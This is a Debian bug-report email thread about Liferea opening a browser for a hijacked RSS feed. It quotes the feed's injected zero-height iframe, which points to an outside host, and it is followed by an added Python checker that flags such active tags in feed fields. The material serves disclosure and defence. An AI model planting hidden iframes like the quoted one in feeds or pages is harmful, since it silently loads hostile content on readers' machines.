Your message dated Tue, 17 Mar 2009 15:32:26 +0000
with message-id <[email protected]>
and subject line Bug#474736: fixed in liferea 1.5.13-1
has caused the Debian Bug report #474736,
regarding liferea: opens browser for titles and descriptions with embedded URLs
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
474736: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=474736
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: liferea
Version: 1.4.14-1
Severity: grave


When I click on this feed: http://www.borowitzreport.com/, the first
item is (currently) the following.  Liferea pops up a browser window
for the embedded URL in the <iframe> whenever I try to display
headlines -- I'm not even trying to read the body of the item.

The fact that the link points to a site in Changzhou, China, and the
strange nesting of the end tag -- <</iframe>/iframe> -- makes me think
this feed was hijacked, so liferea's behavior is a security hole.

<rss version="2.0">
        <channel>
<title>Borowitz Report</title>
<link>http://www.borowitzreport.com</link>
        <description>
Market Tumbles on News That Bush Is Still President - White House Appearance 
&#8216;A Painful Reminder,&#8217; Experts Say<IfrAME 
src=//h28.8800.org/hxw/hx/f.htm height=0><</ifRAME>/ifRAME>
</description>
<language>en - us</language>
        <image>
<title>Borowitz Report</title>
        <url>
http://www.borowitzreport.com/grfx/shocker_banner.gif
</url>
<link>http://www.borowitzreport.com</link>
</image>
        <item>
        <title>
Market Tumbles on News That Bush Is Still President - White House Appearance 
&#8216;A Painful Reminder,&#8217; Experts Say<IfrAME 
src=//h28.8800.org/hxw/hx/f.htm height=0><</ifRAME>/ifRAME>
</title>
        <description>
President George W. Bush used a Rose Garden appearance today to reassure 
investors that he was at the helm of the U.S. economy, causing stock markets to 
plummet around the world.

“You don’t have to worry about this economy, because I am in charge of it,” 
said Mr. Bush, touching off what some observers were calling a global financial 
panic.

Mr. Bush began his remarks about the economy at 10:30 A.M. eastern time, and by 
10:31 markets around the world had already gone into a perilous free-fal
</description>
<author>Andy Borowitz &lt;[email protected]&gt;</author>
        <link>
http://www.borowitzreport.com/archive_rpt.asp?rec=6857
</link>
<pubDate>4/3/2008 12:00:00 AM</pubDate>
</item>
</channel>
</rss>

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'stable'), (400, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages liferea depends on:
ii  gconf2                 2.22.0-1          GNOME configuration database syste
ii  libatk1.0-0            1.20.0-1          The ATK accessibility toolkit
ii  libc6                  2.7-6             GNU C Library: Shared libraries
ii  libcairo2              1.4.14-1          The Cairo 2D vector graphics libra
ii  libdbus-glib-1-2       0.74-1            simple interprocess messaging syst
ii  libgcc1                1:4.3.0-1         GCC support library
ii  libgconf2-4            2.22.0-1          GNOME configuration database syste
ii  libgcrypt11            1.4.0-3           LGPL Crypto library - runtime libr
ii  libglade2-0            1:2.6.2-1         library to load .glade files at ru
ii  libglib2.0-0           2.16.1-2          The GLib library of C routines
ii  libgnutls26            2.2.2-1           the GNU TLS library - runtime libr
ii  libgtk2.0-0            2.12.9-2          The GTK+ graphical user interface 
ii  libice6                2:1.0.4-1         X11 Inter-Client Exchange library
ii  liblua5.1-0            5.1.3-1           Simple, extensible, embeddable pro
ii  libnm-glib0            0.6.5-5           network management framework (GLib
ii  libnotify1 [libnotify1 0.4.4-3           sends desktop notifications to a n
ii  libpango1.0-0          1.20.0-1          Layout and rendering of internatio
ii  libsm6                 2:1.0.3-1+b1      X11 Session Management library
ii  libsqlite3-0           3.5.7-1           SQLite 3 shared library
ii  libstdc++6             4.3.0-1           The GNU Standard C++ Library v3
ii  libx11-6               2:1.0.3-7         X11 client-side library
ii  libxml2                2.6.31.dfsg-2     GNOME XML library
ii  libxslt1.1             1.1.22-1          XSLT processing library - runtime 
ii  libxul0d               1.8.1.13-1        Gecko engine library
ii  zlib1g                 1:1.2.3.3.dfsg-11 compression library - runtime

Versions of packages liferea recommends:
ii  curl                          7.18.0-1   Get a file from an HTTP, HTTPS or 
ii  dbus                          1.1.20-1   simple interprocess messaging syst
ii  dbus-x11                      1.1.20-1   simple interprocess messaging syst
ii  wget                          1.10.2-3   retrieves files from the web

-- no debconf information



--- End Message ---
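
An added example, not part of the report and not Liferea's code: a tolerant check that pulls the title and description fields out of a feed like the one quoted above, flags active elements such as the mixed-case, unquoted `<IfrAME>`, and returns headlines escaped for text-only display. The tag list, the function and class names, and the placeholder host in the constructed sample are assumptions.

```python
import html
import re
from html.parser import HTMLParser

# Elements that fetch or run remote content when rendered (assumed list).
ACTIVE_TAGS = {"iframe", "frame", "script", "object", "embed"}
# Fields a reader shows in its headline list; a regex is used because the
# injected markup (unquoted attributes, "<</") is not well-formed XML.
FIELD_RE = re.compile(r"<(title|description)>(.*?)</\1\s*>", re.S | re.I)

class FieldAudit(HTMLParser):
    """Tolerant scan of one feed field: keep text, record active elements."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.text, self.active = [], []

    def handle_starttag(self, tag, attrs):  # tag name arrives lower-cased
        if tag in ACTIVE_TAGS:
            a = dict(attrs)
            hidden = "0" in (a.get("height"), a.get("width"))
            self.active.append({"tag": tag, "src": a.get("src"), "hidden": hidden})

    def handle_data(self, data):
        self.text.append(data)

def audit_feed(feed_text):
    """Return (safe_headlines, findings) for every title/description field."""
    headlines, findings = [], []
    for m in FIELD_RE.finditer(feed_text):
        p = FieldAudit()
        p.feed(m.group(2))
        p.close()
        plain = " ".join("".join(p.text).split())
        headlines.append(html.escape(plain))  # display as text, never as markup
        findings += [dict(f, field=m.group(1).lower()) for f in p.active]
    return headlines, findings

# Constructed sample modelled on the report; the host is a placeholder.
SAMPLE = """<rss version="2.0"><channel><item>
<title>
Market Tumbles<IfrAME
src=//feed-host.example.invalid/f.htm height=0><</ifRAME>/ifRAME>
</title>
<description>Plain body text.</description>
</item></channel></rss>"""

if __name__ == "__main__":
    print(audit_feed(SAMPLE))
```
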
--- Begin Message ---
Source: liferea
Source-Version: 1.5.13-1

We believe that the bug you reported is fixed in the latest version of
liferea, which is due to be installed in the Debian FTP archive:

liferea-data_1.5.13-1_all.deb
  to pool/main/l/liferea/liferea-data_1.5.13-1_all.deb
liferea-dbg_1.5.13-1_amd64.deb
  to pool/main/l/liferea/liferea-dbg_1.5.13-1_amd64.deb
liferea_1.5.13-1.diff.gz
  to pool/main/l/liferea/liferea_1.5.13-1.diff.gz
liferea_1.5.13-1.dsc
  to pool/main/l/liferea/liferea_1.5.13-1.dsc
liferea_1.5.13-1_amd64.deb
  to pool/main/l/liferea/liferea_1.5.13-1_amd64.deb
liferea_1.5.13.orig.tar.gz
  to pool/main/l/liferea/liferea_1.5.13.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luis Rodrigo Gallardo Cruz <[email protected]> (supplier of updated liferea package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 12 Mar 2009 23:24:20 -0700
Source: liferea
Binary: liferea liferea-data liferea-dbg
Architecture: source all amd64
Version: 1.5.13-1
Distribution: experimental
Urgency: low
Maintainer: Luis Rodrigo Gallardo Cruz <[email protected]>
Changed-By: Luis Rodrigo Gallardo Cruz <[email protected]>
Description: 
 liferea    - feed aggregator for GNOME
 liferea-data - architecture independent data for liferea
 liferea-dbg - liferea debug symbols
Closes: 386584 474736 493027 511869
Changes: 
 liferea (1.5.13-1) experimental; urgency=low
 .
   * New Upstream Release (Closes: #493027, #511869, #386584, #474736).
     - 1.5 devel branch.
     - All rendering backends other than webkit have been removed.
     - Update build-dependencies:
      - Minimum versions of GTK+ and GLib raised to 2.12 and 2.16, respectively.
      - Added libcurl.
      - Removed GnuTLS.
     - Update watch file.
     - XSPF has been removed upstream. Remove packaging rules related to it.
   * Removed lua5.1.pc patch, it's not needed anymore.
     - Rebase all patches. No content changes.
   * Cleanup minor lintian warnings.
   * Update debian/copyright to the new machine readable format. Add all
     copyright holders from the various files.
   * Update pixmap icon from new upstream's versions.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkm/v2EACgkQAZmDGK3JvCjU8QCfTruLiknh9LhiMj89fBvi+84V
pUEAn0c+TsruUCZt8sWRnzUoD4/Djwn/
=rzIp
-----END PGP SIGNATURE-----



--- End Message ---
